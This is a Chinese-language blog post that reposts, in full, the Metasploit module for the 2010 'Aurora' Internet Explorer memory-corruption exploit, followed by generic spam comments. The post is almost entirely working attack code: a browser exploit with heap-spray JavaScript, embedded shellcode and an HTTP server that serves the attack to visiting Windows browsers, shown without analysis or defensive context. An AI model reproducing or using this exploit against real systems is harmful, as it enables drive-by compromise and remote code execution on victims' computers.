Aurora 确定了

##看到HDM的这个可以确定了 ,世界又要开始新的一轮疯狂了
# $Id: ie_aurora.rb 8136 2010-01-15 21:36:04Z hdm $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
        Rank = NormalRanking

        include Msf::Exploit::Remote::HttpServer::HTML
        include Msf::Exploit::Remote::BrowserAutopwn
        autopwn_info({
                :ua_name    => HttpClients::IE,
                :ua_minver  => "6.0",
                :ua_maxver  => "8.0",
                :javascript => true,
                :os_name    => OperatingSystems::WINDOWS,
                :vuln_test  => nil, # no way to test without just trying it
        })


        def initialize(info = {})
                super(update_info(info,
                        'Name'           => 'Microsoft Internet Explorer "Aurora" Memory Corruption',
                        'Description'    => %q{
                                This module exploits a memory corruption flaw in Internet Explorer. This
                        flaw was found in the wild.
                        },
                        'License'        => MSF_LICENSE,
                        'Author'         =>
                                [
                                        'unknown',
                                        'hdm'      # Metasploit port
                                ],
                        'Version'        => '$Revision: 8136 $',
                        'References'     =>
                                [
                                        ['URL', 'http://www.microsoft.com/technet/security/advisory/979352.mspx'],
                                        ['URL', 'http://wepawet.iseclab.org/view.php?hash=1aea206aa64ebeabb07237f1e2230d0f&type=js']

                                ],
                        'DefaultOptions' =>
                                {
                                        'EXITFUNC' => 'process',
                                },
                        'Payload'        =>
                                {
                                        'Space'    => 1000,
                                        'BadChars' => "\x00",
                                        'Compat'   =>
                                                {
                                                        'ConnectionType' => '-find',
                                                },
                                        'StackAdjustment' => -3500,
                                },
                        'Platform'       => 'win',
                        'Targets'        =>
                                [
                                        [ 'Automatic', { }],
                                ],
                        'DisclosureDate' => 'Jan 14 2009', # wepawet sample
                        'DefaultTarget'  => 0))
        end

        def on_request_uri(cli, request)

                if (request.uri.match(/\.gif/i))
                        data = "R0lGODlhAQABAIAAAAAAAAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==".unpack("m*")[0]
                        send_response(cli, data, { 'Content-Type' => 'image/gif' })
                        return
                end

                var_memory    = rand_text_alpha(rand(100) + 1)
                var_boom      = rand_text_alpha(rand(100) + 1)
                var_x1        = rand_text_alpha(rand(100) + 1)
                var_e1        = rand_text_alpha(rand(100) + 1)
                var_e2        = rand_text_alpha(rand(100) + 1)

                var_comment   = rand_text_alpha(rand(100) + 1);
                var_abc       = rand_text_alpha(3);

                var_ev1       = rand_text_alpha(rand(100) + 1)
                var_ev2       = rand_text_alpha(rand(100) + 1)
                var_sp1       = rand_text_alpha(rand(100) + 1)

                var_unescape  = rand_text_alpha(rand(100) + 1)
                var_shellcode = rand_text_alpha(rand(100) + 1)
                var_spray     = rand_text_alpha(rand(100) + 1)
                var_start     = rand_text_alpha(rand(100) + 1)
                var_i         = rand_text_alpha(rand(100) + 1)

                rand_html     = rand_text_english(rand(400) + 500)

                html = %Q|<html>
<head>
<script>

        var #{var_comment} = "COMMENT";

        var #{var_x1} = new Array();
        for (i = 0; i < 200; i ++ ){
           #{var_x1} = document.createElement(#{var_comment});
           #{var_x1}.data = "#{var_abc}";
        };

        var #{var_e1} = null;

        var #{var_memory} = new Array();
        var #{var_unescape} = unescape;

        function #{var_boom}() {

                var #{var_shellcode} = #{var_unescape}( '#{Rex::Text.to_unescape(regenerate_payload(cli).encoded)}');

                var #{var_spray} = #{var_unescape}( "%" + "u" + "0" + "c" + "0" + "d" + "%u" + "0" + "c" + "0" + "d" );

                do { #{var_spray} += #{var_spray} } while( #{var_spray}.length < 0xd0000 );

                for(#{var_i} = 0; #{var_i} < 100; #{var_i}++) #{var_memory}[#{var_i}] = #{var_spray} + #{var_shellcode};
        }

        function #{var_ev1}(evt){
                #{var_boom}();
            #{var_e1} = document.createEventObject(evt);
            document.getElementById("#{var_sp1}").innerHTML = "";
            window.setInterval(#{var_ev2}, 50);
        }

        function #{var_ev2}(){
          p = "\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d";
          for (i = 0; i < #{var_x1}.length; i ++ ){
              #{var_x1}.data = p;
          }

          var t = #{var_e1}.srcElement;
        }
</script>
</head>
<body>

<span id="#{var_sp1}"><img src="#{get_resource}#{var_start}.gif" onload="#{var_ev1}(event)"></span></body></html>

</body>
</html>
                |

                # Transmit the compressed response to the client
                send_response(cli, html, { 'Content-Type' => 'text/html', 'Pragma' => 'no-cache' })

                # Handle the payload
                handler(cli)
        end
end

文章来自: 本站原创
引用通告: 查看所有引用 | 我要引用此文章
Tags:
评论: 41 | 引用: 0 | 查看次数: 10279
回复回复Delphia[2018-01-25 05:35 PM | del]
The info is really important.
回复回复Lucretia[2018-01-15 01:56 PM | del]
Surprisingly individual friendly website. Huge information offered on few gos to.
回复回复Fran[2017-12-11 06:43 AM | del]
Thank you for sharing your amazing websites.
回复回复Alvaro[2017-12-04 04:17 PM | del]
Great website! It looks really expert! Keep up the helpful work!
回复回复Trisha[2017-12-02 01:19 AM | del]
Thanks, this site is extremely handy.
回复回复Jade[2017-11-28 05:18 PM | del]
Unbelievably individual pleasant website. Immense details available on couple of clicks.
回复回复Maddison[2017-11-24 08:30 PM | del]
Your information is amazingly unique.
回复回复Betsey[2017-11-06 07:32 AM | del]
You have one of the best webpages.
回复回复Lena[2017-04-30 05:43 AM | del]
What's up everyone, it's my first visit at this web site, and piece of writing is truly fruitful for me, keep up posting these types of articles.
回复回复Russel[2017-03-31 12:05 AM | del]
Hello there! I could have sworn I've been to this blog before but after browsing through some of the post I realized it's new to me.
Anyways, I'm definitely glad I found it and I'll be book-marking and checking back frequently!
发表评论
昵 称:
密 码: 游客发言不需要密码.
内 容:
验证码: 验证码
选 项:
虽然发表评论不用注册,但是为了保护您的发言权,建议您注册帐号.
字数限制 1000 字 | UBB代码 开启 | [img]标签 关闭